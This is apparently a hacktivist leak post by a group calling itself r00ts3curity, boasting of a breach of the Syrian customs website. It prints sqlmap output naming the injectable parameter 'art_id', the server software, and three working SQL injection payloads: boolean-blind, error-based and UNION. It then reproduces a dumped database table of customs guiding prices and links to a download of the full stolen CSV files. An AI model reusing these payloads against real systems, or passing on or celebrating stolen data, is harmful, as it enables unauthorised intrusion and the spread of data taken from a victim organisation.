#OpFuckSyria - customs.gov.sy - #Leaked #r00ts3curity

1. We are r00ts3curity, let's keep this simple & sweet to save room for the dump..so allow me to introduce too you..
2.  
3. [www.customs.gov.sy] - #DUMPED for ..who?
4.  
5.  
6. _ _ _____ ______ _ _____ _
7. _| || |_| _ | | ___| | | / ___| (_)
8. |_ __ _| | | |_ __ | |_ _ _ ___| | _\ `--. _ _ _ __ _ __ _
9. _| || |_| | | | '_ \| _| | | |/ __| |/ /`--. \ | | | '__| |/ _` |
10. |_ __ _\ \_/ / |_) | | | |_| | (__| </\__/ / |_| | | | | (_| |
11. |_||_| \___/| .__/\_| \__,_|\___|_|\_\____/ \__, |_| |_|\__,_|
12. | | __/ |
13. |_| |___/
14.  
15. -We warned you, did we not?
16. - Here it is..
17. #r00ts3curity - @r00ts3c_L - @FraudFighter2 - @1337n3rd - @_TheQuizMaster
18. ----------------------------------------------------------------------------------------
19. web server operating system: Linux CentOS 5.8
20. web application technology: Apache 2.2.3, PHP 5.1.6
21. back-end DBMS: MySQL 5.0
22. available databases [2]:
23. [*] cust_sy_db
24. [*] information_schema
25.  
26. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
27. ---
28. Place: GET
29. Parameter: art_id
30. Type: boolean-based blind
31. Title: AND boolean-based blind - WHERE or HAVING clause
32. Payload: art_id=5 AND 7650=7650
33.  
34. Type: error-based
35. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
36. Payload: art_id=5 AND (SELECT 2769 FROM(SELECT COUNT(*),CONCAT(0x7176666471,(SELECT (CASE WHEN (2769=2769) THEN 1 ELSE 0 END)),0x716b676a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
37.  
38. Type: UNION query
39. Title: MySQL UNION query (NULL) - 10 columns
40. Payload: art_id=5 UNION ALL SELECT NULL,CONCAT(0x7176666471,0x7861557342454e616d68,0x716b676a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
41. ---
42. web server operating system: Linux CentOS 5.8
43. web application technology: Apache 2.2.3, PHP 5.1.6
44. back-end DBMS: MySQL 5.0
45. Database: cust_sy_db
46. Table: guiding_price_list
47. [31 entries]
48. +----+--------+----------+------+---------------------+---------+---------+------------+-------------------------------------------------------------------------+
49. | Id | dec_id | code | unit | notes | origin | value | currency | description |
50. +----+--------+----------+------+---------------------+---------+---------+------------+-------------------------------------------------------------------------+
51. | 1 | 1 | 84145100 | إنش | 56" | <blank> | 8 | دولار | مروحة سقفية (غطاء بلاستيك)\r\nCeilling Fan (Plastic Cover) |
52. | 2 | 1 | 84145100 | إنش | 56" | <blank> | 6 | دولار | مروحة سقفية صناعية (غطاء معدني)\r\nIndustrial Ceiling Fan (Metal Cover) |
53. | 12 | 1 | 84145100 | إنش | 16” | <blank> | 8 | دولار | مروحة جدارية\r\nWall Fan |
54. | 13 | 1 | 84145100 | إنش | 18” | <blank> | 9 | دولار | مروحة جدارية\r\nWall Fan |
55. | 14 | 1 | 84145100 | إنش | 12” | <blank> | 5 | دولار | مروحة صندوقية\r\nBox Fan\r\n |
56. | 15 | 1 | 84145100 | إنش | 14” | <blank> | 9 | دولار | مروحة صندوقية\r\nBox Fan\r\n |
57. | 16 | 1 | 84145100 | إنش | 16” | <blank> | 11 | دولار | مروحة صندوقية\r\nBox Fan\r\n |
58. | 17 | 1 | 84145100 | إنش | 18” | <blank> | 14 | دولار | مروحة صندوقية\r\nBox Fan\r\n |
59. | 18 | 1 | 84145100 | إنش | 20” | <blank> | 16 | دولار | مروحة صندوقية\r\nBox Fan\r\n |
60. | 19 | 1 | 84145100 | إنش | 14” | <blank> | 7 | دولار | مروحة مكتبية\r\nDesk Fan\r\n |
61. | 20 | 1 | 84145100 | إنش | 16” | <blank> | 9 | دولار | مروحة مكتبية\r\nDesk Fan\r\n |
62. | 21 | 1 | 85161000 | واط | <blank> | <blank> | 3 | دولار | مدفئة كهربائية\r\nElectric Heater\r\n |
63. | 22 | 1 | 85161000 | واط | <blank> | <blank> | 6 | دولار | مدفئة كهربائية\r\nElectric Heater\r\n |
64. | 23 | 1 | 85161000 | واط | 1200w 2000w | <blank> | 7 | دولار | مدفئة كهربائية\r\nElectric Heater\r\n |
65. | 24 | 1 | 85161000 | واط | 1200w 2000w | <blank> | 7 | دولار | مدفئة كهربائية\r\nElectric Heater\r\n |
66. | 25 | 1 | 85161000 | واط | 1200w 2000w | <blank> | 7 | دولار | مدفئة كهربائية\r\nElectric Heater\r\n |
67. | 26 | 1 | 85161000 | واط | 1200w 2000w | <blank> | 7 | دولار | مدفئة كهربائية\r\nElectric Heater\r\n |
68. | 27 | 1 | 85161000 | واط | 1200w 2000w | <blank> | 7 | دولار | مدفئة كهربائية\r\nElectric Heater\r\n |
69. | 28 | 1 | 85161000 | واط | للشفرة الواحدة | <blank> | 1 | دولار | مدفئة كهربائية\r\nElectric Heater\r\n |
70. | 29 | 2 | 25010000 | طن | <blank> | <blank> | 12 | دولار | الملح الخام |
71. | 30 | 2 | 25010000 | طن | <blank> | <blank> | 22 | دولار | ملح الطعام |
72. | 31 | 2 | 08021100 | طن | <blank> | <blank> | 2250 | دولار | اللوز ( بقشر ) |
73. | 32 | 2 | 08021200 | طن | عبوات أكثر من 25 كغ | <blank> | 4500 | دولار | اللوز ( مقشر ) |
74. | 33 | 3 | 19.05 | كغ | <blank> | <blank> | 45 | ليرة سورية | بسكويت سادة |
75. | 34 | 3 | 19.05 | كغ | <blank> | <blank> | 60 | ليرة سورية | بسكويت محشي |
76. | 35 | 3 | 19.05 | كغ | <blank> | <blank> | 70 | ليرة سورية | بسكويت مغطس بالشوكولا |
77. | 36 | 3 | 19.05 | كغ | <blank> | <blank> | 2 | دولار | الكعك والبيتفور |
78. | 37 | 3 | 04.01 | كغ | <blank> | <blank> | 40 | ليرة سورية | حليب السائل وغير المجفف |
79. | 38 | 3 | 20.09 | ليتر | <blank> | <blank> | 50 | ليرة سورية | عصير طبيعي نسبة 100 % تعبئة كرتون – زجاج – بلاستيك |
80. | 39 | 3 | 20.09 | ليتر | <blank> | <blank> | 32 | ليرة سورية | عصير طبيعي نسبة تركيزه أقل دون 50 % بعبوة كرتونية أو زجاجية |
81. | 40 | 3 | 20.09 | ليتر | <blank> | <blank> | 27 | ليرة سورية | عصير طبيعي نسبة تركيزه دون 50 % بعبوات بلاستيكية |
82. +----+--------+----------+------+---------------------+---------+---------+------------+-------------------------------------------------------------------------+
83. -Want more?
84. -------------------------------------------------------------------------------+
85. uploaded with full CSV files included:
86. http://uploaded.net/file/fl4ulbw4
87.  
88. #Enjoy #r00ts3curity